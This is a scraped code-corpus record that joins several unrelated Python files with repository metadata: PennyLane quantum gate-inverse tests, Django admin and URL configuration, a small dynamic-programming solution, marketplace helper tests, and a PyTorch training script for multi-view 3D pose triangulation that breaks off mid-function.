("Rot", [-math.pi / 4, math.pi / 4, math.pi / 2], 1 / math.sqrt(2)),
],
)
def test_unsupported_gate_inverses(self, name, par, expected_output):
"""Test the inverse of single gates with parameters"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
@qml.qnode(dev)
def circuit():
op(*np.negative(par), wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_s_gate_inverses(self, par):
"""Tests the inverse of the S gate"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = -0.5 * 1j * cmath.exp(-1j * par) * (-1 + cmath.exp(2j * par))
@qml.qnode(dev)
def circuit():
qml.Hadamard(0)
qml.RZ(par, wires=[0])
qml.S(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_t_gate_inverses(self, par):
"""Tests the inverse of the T gate"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = -math.sin(par) / math.sqrt(2)
@qml.qnode(dev)
def circuit():
qml.RX(par, wires=[0])
qml.T(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_sx_gate_inverses(self, par):
"""Tests the inverse of the SX gate"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = math.sin(par)
@qml.qnode(dev)
def circuit():
qml.RY(par, wires=[0])
qml.SX(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
| 33.306569 | 101 | 0.483783 | import pytest
import pennylane as qml
import math
import cmath
import numpy as np
tol = 1e-5
class TestInverses:
@pytest.mark.parametrize(
"name,expected_output",
[
("Identity", 1),
("PauliX", -1),
("PauliY", -1),
("PauliZ", 1),
("Hadamard", 0),
("S", 1),
("T", 1),
("SX", 0),
],
)
def test_supported_gate_inverse_single_wire_no_parameters(self, name, expected_output):
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
@qml.qnode(dev)
def circuit():
op(wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,expected_output",
[
("CNOT", [-1 / 2, 1]),
("SWAP", [-1 / 2, -1 / 2]),
("CZ", [-1 / 2, -1 / 2]),
],
)
def test_supported_gate_inverse_two_wires_no_parameters(self, name, expected_output):
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.QubitStateVector(np.array([1 / 2, 0, 0, math.sqrt(3) / 2]), wires=[0, 1])
op(wires=[0, 1]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,expected_output",
[
("CSWAP", [-1, -1, 1]),
],
)
def test_supported_gate_inverse_three_wires_no_parameters(self, name, expected_output):
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=3, shots=None)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.BasisState(np.array([1, 0, 1]), wires=[0, 1, 2])
op(wires=[0, 1, 2]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)), qml.expval(qml.PauliZ(2))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,par,expected_output",
[
("PhaseShift", [math.pi / 2], 1),
("PhaseShift", [-math.pi / 4], 1),
("RX", [math.pi / 2], 0),
("RX", [-math.pi / 4], 1 / math.sqrt(2)),
("RY", [math.pi / 2], 0),
("RY", [-math.pi / 4], 1 / math.sqrt(2)),
("RZ", [math.pi / 2], 1),
("RZ", [-math.pi / 4], 1),
(
"QubitUnitary",
[
np.array(
[
[1j / math.sqrt(2), 1j / math.sqrt(2)],
[1j / math.sqrt(2), -1j / math.sqrt(2)],
]
)
],
0,
),
(
"QubitUnitary",
[
np.array(
[
[-1j / math.sqrt(2), 1j / math.sqrt(2)],
[1j / math.sqrt(2), 1j / math.sqrt(2)],
]
)
],
0,
),
],
)
def test_supported_gate_inverse_single_wire_with_parameters(self, name, par, expected_output):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
op(*np.negative(par), wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,par,expected_output",
[
("CRZ", [0], [-1 / 2, -1 / 2]),
("CRZ", [-math.pi], [-1 / 2, -1 / 2]),
("CRZ", [math.pi / 2], [-1 / 2, -1 / 2]),
(
"QubitUnitary",
[
np.array(
[
[1, 0, 0, 0],
[0, 1 / math.sqrt(2), 1 / math.sqrt(2), 0],
[0, 1 / math.sqrt(2), -1 / math.sqrt(2), 0],
[0, 0, 0, 1],
]
)
],
[-1 / 2, -1 / 2],
),
(
"QubitUnitary",
[
np.array(
[
[-1, 0, 0, 0],
[0, 1 / math.sqrt(2), 1 / math.sqrt(2), 0],
[0, 1 / math.sqrt(2), -1 / math.sqrt(2), 0],
[0, 0, 0, -1],
]
)
],
[-1 / 2, -1 / 2],
),
],
)
def test_supported_gate_inverse_two_wires_with_parameters(self, name, par, expected_output):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.QubitStateVector(np.array([1 / 2, 0, 0, math.sqrt(3) / 2]), wires=[0, 1])
op(*np.negative(par), wires=[0, 1]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,par,expected_output",
[
("Rot", [math.pi / 2, 0, 0], 1),
("Rot", [0, math.pi / 2, 0], 0),
("Rot", [0, 0, math.pi / 2], 1),
("Rot", [math.pi / 2, -math.pi / 4, -math.pi / 4], 1 / math.sqrt(2)),
("Rot", [-math.pi / 4, math.pi / 2, math.pi / 4], 0),
("Rot", [-math.pi / 4, math.pi / 4, math.pi / 2], 1 / math.sqrt(2)),
],
)
def test_unsupported_gate_inverses(self, name, par, expected_output):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
@qml.qnode(dev)
def circuit():
op(*np.negative(par), wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_s_gate_inverses(self, par):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = -0.5 * 1j * cmath.exp(-1j * par) * (-1 + cmath.exp(2j * par))
@qml.qnode(dev)
def circuit():
qml.Hadamard(0)
qml.RZ(par, wires=[0])
qml.S(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_t_gate_inverses(self, par):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = -math.sin(par) / math.sqrt(2)
@qml.qnode(dev)
def circuit():
qml.RX(par, wires=[0])
qml.T(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_sx_gate_inverses(self, par):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = math.sin(par)
@qml.qnode(dev)
def circuit():
qml.RY(par, wires=[0])
qml.SX(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
| true | true |
1c3c83f5e994692e0b4ca45b088cf657453bd348 | 257 | py | Python | admin.py | klml/frieda | 52d4b393108e3ee34f6671689ee565c7876cf93c | [
"MIT"
] | null | null | null | admin.py | klml/frieda | 52d4b393108e3ee34f6671689ee565c7876cf93c | [
"MIT"
] | null | null | null | admin.py | klml/frieda | 52d4b393108e3ee34f6671689ee565c7876cf93c | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import *
admin.site.register(Organisation)
admin.site.register(Internship)
admin.site.register(SchoolYear)
admin.site.register(InternshipAssignment)
admin.site.register(School)
admin.site.register(Metacontent)
| 25.7 | 41 | 0.836576 | from django.contrib import admin
from .models import *
admin.site.register(Organisation)
admin.site.register(Internship)
admin.site.register(SchoolYear)
admin.site.register(InternshipAssignment)
admin.site.register(School)
admin.site.register(Metacontent)
| true | true |
1c3c84c2bcf237ec22e42098df98128eb44cf3ec | 771 | py | Python | api/urls.py | ebar0n/palermo-coin | 63dc14fce31fbeae50ec7ebf5ea97efbb1ec18fd | [
"MIT"
] | null | null | null | api/urls.py | ebar0n/palermo-coin | 63dc14fce31fbeae50ec7ebf5ea97efbb1ec18fd | [
"MIT"
] | 15 | 2019-05-13T23:40:06.000Z | 2022-03-11T23:39:57.000Z | api/urls.py | ebar0n/leviatan-backend | 63dc14fce31fbeae50ec7ebf5ea97efbb1ec18fd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import django
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.urls import path, re_path
urlapi = [
path('api/social/', include('social_django.urls')),
path('api/v1/', include('accounts.urls')),
]
urlpatterns = urlapi + [
path('admin/', admin.site.urls),
re_path('static/(.*)$', django.views.static.serve, {'document_root': settings.STATIC_ROOT}),
re_path('media/(.*)$', django.views.static.serve, {'document_root': settings.MEDIA_ROOT}),
]
if settings.DOCS:
from rest_framework_swagger.views import get_swagger_view
schema_view = get_swagger_view(title='Leviatan API', patterns=urlapi)
urlpatterns += [
url(r'^$', schema_view)
]
| 32.125 | 96 | 0.693904 |
import django
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.urls import path, re_path
urlapi = [
path('api/social/', include('social_django.urls')),
path('api/v1/', include('accounts.urls')),
]
urlpatterns = urlapi + [
path('admin/', admin.site.urls),
re_path('static/(.*)$', django.views.static.serve, {'document_root': settings.STATIC_ROOT}),
re_path('media/(.*)$', django.views.static.serve, {'document_root': settings.MEDIA_ROOT}),
]
if settings.DOCS:
from rest_framework_swagger.views import get_swagger_view
schema_view = get_swagger_view(title='Leviatan API', patterns=urlapi)
urlpatterns += [
url(r'^$', schema_view)
]
| true | true |
1c3c84f01638ab8da76b3c0047c0ecaef5bd4cea | 514 | py | Python | src/dynamic_programming/boj_9095.py | joeyworld/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | 1 | 2019-02-11T09:18:14.000Z | 2019-02-11T09:18:14.000Z | src/dynamic_programming/boj_9095.py | gyukebox/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | null | null | null | src/dynamic_programming/boj_9095.py | gyukebox/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | null | null | null | previous_answers = [None] * 12
previous_answers[0] = 1
previous_answers[1] = 1
previous_answers[2] = 2
def solve(n):
for i in range(3, n + 1):
previous_answers[i] = previous_answers[i - 1] + \
previous_answers[i - 2] + previous_answers[i - 3]
if __name__ == '__main__':
input_case = int(input())
inputs = [int(input()) for _ in range(input_case)]
[solve(single_input) for single_input in inputs]
for single_input in inputs:
print(previous_answers[single_input])
| 27.052632 | 61 | 0.655642 | previous_answers = [None] * 12
previous_answers[0] = 1
previous_answers[1] = 1
previous_answers[2] = 2
def solve(n):
for i in range(3, n + 1):
previous_answers[i] = previous_answers[i - 1] + \
previous_answers[i - 2] + previous_answers[i - 3]
if __name__ == '__main__':
input_case = int(input())
inputs = [int(input()) for _ in range(input_case)]
[solve(single_input) for single_input in inputs]
for single_input in inputs:
print(previous_answers[single_input])
| true | true |
1c3c8538f6866ad436f11ca1f85faa77a06bcf75 | 3,293 | py | Python | tests/main/helpers/test_framework_helpers.py | uk-gov-mirror/alphagov.digitalmarketplace-buyer-frontend | ec3751b6d24842cc53febb20391ae340c0fea756 | [
"MIT"
] | 4 | 2017-10-12T16:15:01.000Z | 2020-11-28T03:41:15.000Z | tests/main/helpers/test_framework_helpers.py | uk-gov-mirror/alphagov.digitalmarketplace-buyer-frontend | ec3751b6d24842cc53febb20391ae340c0fea756 | [
"MIT"
] | 615 | 2015-02-27T15:45:43.000Z | 2021-07-01T10:09:55.000Z | tests/main/helpers/test_framework_helpers.py | uk-gov-mirror/alphagov.digitalmarketplace-buyer-frontend | ec3751b6d24842cc53febb20391ae340c0fea756 | [
"MIT"
] | 15 | 2015-06-30T14:35:20.000Z | 2021-04-10T18:06:36.000Z | import mock
import pytest
from dmapiclient import HTTPError
from dmtestutils.api_model_stubs import FrameworkStub
from app.main.helpers.framework_helpers import get_framework_or_500, get_latest_live_framework, get_lots_by_slug
from ...helpers import BaseApplicationTest, CustomAbortException
class TestBuildSearchQueryHelpers(BaseApplicationTest):
def setup_method(self, method):
super().setup_method(method)
self.available_frameworks = self._get_frameworks_list_fixture_data().get('frameworks')
def test_get_latest_live_framework(self):
latest_framework_when_fixture_updated = 'g-cloud-9' # fixture set in base class
latest_live_framework = get_latest_live_framework(self.available_frameworks, 'g-cloud')
assert latest_live_framework['slug'] == latest_framework_when_fixture_updated
def test_get_lots_by_slug(self):
g_cloud_9_data = next((f for f in self.available_frameworks if f['slug'] == 'g-cloud-9'))
lots_by_slug = get_lots_by_slug(g_cloud_9_data)
assert lots_by_slug['cloud-hosting'] == g_cloud_9_data['lots'][0]
assert lots_by_slug['cloud-software'] == g_cloud_9_data['lots'][1]
assert lots_by_slug['cloud-support'] == g_cloud_9_data['lots'][2]
class TestGetFrameworkOr500():
def test_returns_framework(self):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.return_value = FrameworkStub().single_result_response()
assert get_framework_or_500(data_api_client_mock, 'g-cloud-10')['slug'] == 'g-cloud-10'
@mock.patch('app.main.helpers.framework_helpers.abort')
def test_aborts_with_500_if_framework_not_found(self, abort):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=404), 'Framework not found')
abort.side_effect = CustomAbortException()
with pytest.raises(CustomAbortException):
get_framework_or_500(data_api_client_mock, 'g-cloud-7')
assert abort.call_args_list == [
mock.call(500, 'Framework not found: g-cloud-7')
]
def test_raises_original_error_if_not_404(self):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=400), 'Original exception')
with pytest.raises(HTTPError) as original_exception:
get_framework_or_500(data_api_client_mock, 'g-cloud-7')
assert original_exception.value.message == 'Original exception'
assert original_exception.value.status_code == 400
@mock.patch('app.main.helpers.framework_helpers.abort')
def test_calls_logger_if_provided(self, abort):
data_api_client_mock = mock.Mock()
logger_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=404), 'An error from the API')
get_framework_or_500(data_api_client_mock, 'g-cloud-7', logger_mock)
assert logger_mock.error.call_args_list == [
mock.call(
'Framework not found. Error: {error}, framework_slug: {framework_slug}',
extra={'error': 'An error from the API (status: 404)', 'framework_slug': 'g-cloud-7'},
)
]
| 43.906667 | 119 | 0.722138 | import mock
import pytest
from dmapiclient import HTTPError
from dmtestutils.api_model_stubs import FrameworkStub
from app.main.helpers.framework_helpers import get_framework_or_500, get_latest_live_framework, get_lots_by_slug
from ...helpers import BaseApplicationTest, CustomAbortException
class TestBuildSearchQueryHelpers(BaseApplicationTest):
def setup_method(self, method):
super().setup_method(method)
self.available_frameworks = self._get_frameworks_list_fixture_data().get('frameworks')
def test_get_latest_live_framework(self):
latest_framework_when_fixture_updated = 'g-cloud-9'
latest_live_framework = get_latest_live_framework(self.available_frameworks, 'g-cloud')
assert latest_live_framework['slug'] == latest_framework_when_fixture_updated
def test_get_lots_by_slug(self):
g_cloud_9_data = next((f for f in self.available_frameworks if f['slug'] == 'g-cloud-9'))
lots_by_slug = get_lots_by_slug(g_cloud_9_data)
assert lots_by_slug['cloud-hosting'] == g_cloud_9_data['lots'][0]
assert lots_by_slug['cloud-software'] == g_cloud_9_data['lots'][1]
assert lots_by_slug['cloud-support'] == g_cloud_9_data['lots'][2]
class TestGetFrameworkOr500():
def test_returns_framework(self):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.return_value = FrameworkStub().single_result_response()
assert get_framework_or_500(data_api_client_mock, 'g-cloud-10')['slug'] == 'g-cloud-10'
@mock.patch('app.main.helpers.framework_helpers.abort')
def test_aborts_with_500_if_framework_not_found(self, abort):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=404), 'Framework not found')
abort.side_effect = CustomAbortException()
with pytest.raises(CustomAbortException):
get_framework_or_500(data_api_client_mock, 'g-cloud-7')
assert abort.call_args_list == [
mock.call(500, 'Framework not found: g-cloud-7')
]
def test_raises_original_error_if_not_404(self):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=400), 'Original exception')
with pytest.raises(HTTPError) as original_exception:
get_framework_or_500(data_api_client_mock, 'g-cloud-7')
assert original_exception.value.message == 'Original exception'
assert original_exception.value.status_code == 400
@mock.patch('app.main.helpers.framework_helpers.abort')
def test_calls_logger_if_provided(self, abort):
data_api_client_mock = mock.Mock()
logger_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=404), 'An error from the API')
get_framework_or_500(data_api_client_mock, 'g-cloud-7', logger_mock)
assert logger_mock.error.call_args_list == [
mock.call(
'Framework not found. Error: {error}, framework_slug: {framework_slug}',
extra={'error': 'An error from the API (status: 404)', 'framework_slug': 'g-cloud-7'},
)
]
| true | true |
1c3c86051e26cdba0af4cc1b6ba464e9e0254444 | 21,785 | py | Python | train.py | aki34/learnable-triangulation-pytorch | e2a37b30ff7f0cfff474841f8033d37a9dab9926 | [
"MIT"
] | 1 | 2021-02-01T09:07:10.000Z | 2021-02-01T09:07:10.000Z | train.py | sg47/learnable-triangulation-pytorch | 4ada88f871078c8d27ea92d422d16c7104818169 | [
"MIT"
] | null | null | null | train.py | sg47/learnable-triangulation-pytorch | 4ada88f871078c8d27ea92d422d16c7104818169 | [
"MIT"
] | 1 | 2020-03-18T01:25:00.000Z | 2020-03-18T01:25:00.000Z | import os
import shutil
import argparse
import time
import json
from datetime import datetime
from collections import defaultdict
from itertools import islice
import pickle
import copy
import numpy as np
import cv2
import torch
from torch import nn
from torch import autograd
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.nn.parallel import DistributedDataParallel
from tensorboardX import SummaryWriter
from mvn.models.triangulation import RANSACTriangulationNet, AlgebraicTriangulationNet, VolumetricTriangulationNet
from mvn.models.loss import KeypointsMSELoss, KeypointsMSESmoothLoss, KeypointsMAELoss, KeypointsL2Loss, VolumetricCELoss
from mvn.utils import img, multiview, op, vis, misc, cfg
from mvn.datasets import human36m
from mvn.datasets import utils as dataset_utils
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, required=True, help="Path, where config file is stored")
parser.add_argument('--eval', action='store_true', help="If set, then only evaluation will be done")
parser.add_argument('--eval_dataset', type=str, default='val', help="Dataset split on which evaluate. Can be 'train' and 'val'")
parser.add_argument("--local_rank", type=int, help="Local rank of the process on the node")
parser.add_argument("--seed", type=int, default=42, help="Random seed for reproducibility")
parser.add_argument("--logdir", type=str, default="/Vol1/dbstore/datasets/k.iskakov/logs/multi-view-net-repr", help="Path, where logs will be stored")
args = parser.parse_args()
return args
def setup_human36m_dataloaders(config, is_train, distributed_train):
train_dataloader = None
if is_train:
# train
train_dataset = human36m.Human36MMultiViewDataset(
h36m_root=config.dataset.train.h36m_root,
pred_results_path=config.dataset.train.pred_results_path if hasattr(config.dataset.train, "pred_results_path") else None,
train=True,
test=False,
image_shape=config.image_shape if hasattr(config, "image_shape") else (256, 256),
labels_path=config.dataset.train.labels_path,
with_damaged_actions=config.dataset.train.with_damaged_actions,
scale_bbox=config.dataset.train.scale_bbox,
kind=config.kind,
undistort_images=config.dataset.train.undistort_images,
ignore_cameras=config.dataset.train.ignore_cameras if hasattr(config.dataset.train, "ignore_cameras") else [],
crop=config.dataset.train.crop if hasattr(config.dataset.train, "crop") else True,
)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if distributed_train else None
train_dataloader = DataLoader(
train_dataset,
batch_size=config.opt.batch_size,
shuffle=config.dataset.train.shuffle and (train_sampler is None), # debatable
sampler=train_sampler,
collate_fn=dataset_utils.make_collate_fn(randomize_n_views=config.dataset.train.randomize_n_views,
min_n_views=config.dataset.train.min_n_views,
max_n_views=config.dataset.train.max_n_views),
num_workers=config.dataset.train.num_workers,
worker_init_fn=dataset_utils.worker_init_fn,
pin_memory=True
)
# val
val_dataset = human36m.Human36MMultiViewDataset(
h36m_root=config.dataset.val.h36m_root,
pred_results_path=config.dataset.val.pred_results_path if hasattr(config.dataset.val, "pred_results_path") else None,
train=False,
test=True,
image_shape=config.image_shape if hasattr(config, "image_shape") else (256, 256),
labels_path=config.dataset.val.labels_path,
with_damaged_actions=config.dataset.val.with_damaged_actions,
retain_every_n_frames_in_test=config.dataset.val.retain_every_n_frames_in_test,
scale_bbox=config.dataset.val.scale_bbox,
kind=config.kind,
undistort_images=config.dataset.val.undistort_images,
ignore_cameras=config.dataset.val.ignore_cameras if hasattr(config.dataset.val, "ignore_cameras") else [],
crop=config.dataset.val.crop if hasattr(config.dataset.val, "crop") else True,
)
val_dataloader = DataLoader(
val_dataset,
batch_size=config.opt.val_batch_size if hasattr(config.opt, "val_batch_size") else config.opt.batch_size,
shuffle=config.dataset.val.shuffle,
collate_fn=dataset_utils.make_collate_fn(randomize_n_views=config.dataset.val.randomize_n_views,
min_n_views=config.dataset.val.min_n_views,
max_n_views=config.dataset.val.max_n_views),
num_workers=config.dataset.val.num_workers,
worker_init_fn=dataset_utils.worker_init_fn,
pin_memory=True
)
return train_dataloader, val_dataloader, train_sampler
def setup_dataloaders(config, is_train=True, distributed_train=False):
if config.dataset.kind == 'human36m':
train_dataloader, val_dataloader, train_sampler = setup_human36m_dataloaders(config, is_train, distributed_train)
else:
raise NotImplementedError("Unknown dataset: {}".format(config.dataset.kind))
return train_dataloader, val_dataloader, train_sampler
def setup_experiment(config, model_name, is_train=True):
prefix = "" if is_train else "eval_"
if config.title:
experiment_title = config.title + "_" + model_name
else:
experiment_title = model_name
experiment_title = prefix + experiment_title
experiment_name = '{}@{}'.format(experiment_title, datetime.now().strftime("%d.%m.%Y-%H:%M:%S"))
print("Experiment name: {}".format(experiment_name))
experiment_dir = os.path.join(args.logdir, experiment_name)
os.makedirs(experiment_dir, exist_ok=True)
checkpoints_dir = os.path.join(experiment_dir, "checkpoints")
os.makedirs(checkpoints_dir, exist_ok=True)
shutil.copy(args.config, os.path.join(experiment_dir, "config.yaml"))
# tensorboard
writer = SummaryWriter(os.path.join(experiment_dir, "tb"))
# dump config to tensorboard
writer.add_text(misc.config_to_str(config), "config", 0)
return experiment_dir, writer
def one_epoch(model, criterion, opt, config, dataloader, device, epoch, n_iters_total=0, is_train=True, caption='', master=False, experiment_dir=None, writer=None):
name = "train" if is_train else "val"
model_type = config.model.name
if is_train:
model.train()
else:
model.eval()
metric_dict = defaultdict(list)
results = defaultdict(list)
# used to turn on/off gradients
grad_context = torch.autograd.enable_grad if is_train else torch.no_grad
with grad_context():
end = time.time()
iterator = enumerate(dataloader)
if is_train and config.opt.n_iters_per_epoch is not None:
iterator = islice(iterator, config.opt.n_iters_per_epoch)
for iter_i, batch in iterator:
with autograd.detect_anomaly():
# measure data loading time
data_time = time.time() - end
if batch is None:
print("Found None batch")
continue
images_batch, keypoints_3d_gt, keypoints_3d_validity_gt, proj_matricies_batch = dataset_utils.prepare_batch(batch, device, config)
keypoints_2d_pred, cuboids_pred, base_points_pred = None, None, None
if model_type == "alg" or model_type == "ransac":
keypoints_3d_pred, keypoints_2d_pred, heatmaps_pred, confidences_pred = model(images_batch, proj_matricies_batch, batch)
elif model_type == "vol":
keypoints_3d_pred, heatmaps_pred, volumes_pred, confidences_pred, cuboids_pred, coord_volumes_pred, base_points_pred = model(images_batch, proj_matricies_batch, batch)
batch_size, n_views, image_shape = images_batch.shape[0], images_batch.shape[1], tuple(images_batch.shape[3:])
n_joints = keypoints_3d_pred[0].shape[1]
keypoints_3d_binary_validity_gt = (keypoints_3d_validity_gt > 0.0).type(torch.float32)
scale_keypoints_3d = config.opt.scale_keypoints_3d if hasattr(config.opt, "scale_keypoints_3d") else 1.0
# 1-view case
if n_views == 1:
if config.kind == "human36m":
base_joint = 6
elif config.kind == "coco":
base_joint = 11
keypoints_3d_gt_transformed = keypoints_3d_gt.clone()
keypoints_3d_gt_transformed[:, torch.arange(n_joints) != base_joint] -= keypoints_3d_gt_transformed[:, base_joint:base_joint + 1]
keypoints_3d_gt = keypoints_3d_gt_transformed
keypoints_3d_pred_transformed = keypoints_3d_pred.clone()
keypoints_3d_pred_transformed[:, torch.arange(n_joints) != base_joint] -= keypoints_3d_pred_transformed[:, base_joint:base_joint + 1]
keypoints_3d_pred = keypoints_3d_pred_transformed
# calculate loss
total_loss = 0.0
loss = criterion(keypoints_3d_pred * scale_keypoints_3d, keypoints_3d_gt * scale_keypoints_3d, keypoints_3d_binary_validity_gt)
total_loss += loss
metric_dict[f'{config.opt.criterion}'].append(loss.item())
# volumetric ce loss
use_volumetric_ce_loss = config.opt.use_volumetric_ce_loss if hasattr(config.opt, "use_volumetric_ce_loss") else False
if use_volumetric_ce_loss:
volumetric_ce_criterion = VolumetricCELoss()
loss = volumetric_ce_criterion(coord_volumes_pred, volumes_pred, keypoints_3d_gt, keypoints_3d_binary_validity_gt)
metric_dict['volumetric_ce_loss'].append(loss.item())
weight = config.opt.volumetric_ce_loss_weight if hasattr(config.opt, "volumetric_ce_loss_weight") else 1.0
total_loss += weight * loss
metric_dict['total_loss'].append(total_loss.item())
if is_train:
opt.zero_grad()
total_loss.backward()
if hasattr(config.opt, "grad_clip"):
torch.nn.utils.clip_grad_norm_(model.parameters(), config.opt.grad_clip / config.opt.lr)
metric_dict['grad_norm_times_lr'].append(config.opt.lr * misc.calc_gradient_norm(filter(lambda x: x[1].requires_grad, model.named_parameters())))
opt.step()
# calculate metrics
l2 = KeypointsL2Loss()(keypoints_3d_pred * scale_keypoints_3d, keypoints_3d_gt * scale_keypoints_3d, keypoints_3d_binary_validity_gt)
metric_dict['l2'].append(l2.item())
# base point l2
if base_points_pred is not None:
base_point_l2_list = []
for batch_i in range(batch_size):
base_point_pred = base_points_pred[batch_i]
if config.model.kind == "coco":
base_point_gt = (keypoints_3d_gt[batch_i, 11, :3] + keypoints_3d[batch_i, 12, :3]) / 2
elif config.model.kind == "mpii":
base_point_gt = keypoints_3d_gt[batch_i, 6, :3]
base_point_l2_list.append(torch.sqrt(torch.sum((base_point_pred * scale_keypoints_3d - base_point_gt * scale_keypoints_3d) ** 2)).item())
base_point_l2 = 0.0 if len(base_point_l2_list) == 0 else np.mean(base_point_l2_list)
metric_dict['base_point_l2'].append(base_point_l2)
# save answers for evalulation
if not is_train:
results['keypoints_3d'].append(keypoints_3d_pred.detach().cpu().numpy())
results['indexes'].append(batch['indexes'])
# plot visualization
if master:
if n_iters_total % config.vis_freq == 0:# or total_l2.item() > 500.0:
vis_kind = config.kind
if (config.transfer_cmu_to_human36m if hasattr(config, "transfer_cmu_to_human36m") else False):
vis_kind = "coco"
for batch_i in range(min(batch_size, config.vis_n_elements)):
keypoints_vis = vis.visualize_batch(
images_batch, heatmaps_pred, keypoints_2d_pred, proj_matricies_batch,
keypoints_3d_gt, keypoints_3d_pred,
kind=vis_kind,
cuboids_batch=cuboids_pred,
confidences_batch=confidences_pred,
batch_index=batch_i, size=5,
max_n_cols=10
)
writer.add_image(f"{name}/keypoints_vis/{batch_i}", keypoints_vis.transpose(2, 0, 1), global_step=n_iters_total)
heatmaps_vis = vis.visualize_heatmaps(
images_batch, heatmaps_pred,
kind=vis_kind,
batch_index=batch_i, size=5,
max_n_rows=10, max_n_cols=10
)
writer.add_image(f"{name}/heatmaps/{batch_i}", heatmaps_vis.transpose(2, 0, 1), global_step=n_iters_total)
if model_type == "vol":
volumes_vis = vis.visualize_volumes(
images_batch, volumes_pred, proj_matricies_batch,
kind=vis_kind,
cuboids_batch=cuboids_pred,
batch_index=batch_i, size=5,
max_n_rows=1, max_n_cols=16
)
writer.add_image(f"{name}/volumes/{batch_i}", volumes_vis.transpose(2, 0, 1), global_step=n_iters_total)
# dump weights to tensoboard
if n_iters_total % config.vis_freq == 0:
for p_name, p in model.named_parameters():
try:
writer.add_histogram(p_name, p.clone().cpu().data.numpy(), n_iters_total)
except ValueError as e:
print(e)
print(p_name, p)
exit()
# dump to tensorboard per-iter loss/metric stats
if is_train:
for title, value in metric_dict.items():
writer.add_scalar(f"{name}/{title}", value[-1], n_iters_total)
# measure elapsed time
batch_time = time.time() - end
end = time.time()
# dump to tensorboard per-iter time stats
writer.add_scalar(f"{name}/batch_time", batch_time, n_iters_total)
writer.add_scalar(f"{name}/data_time", data_time, n_iters_total)
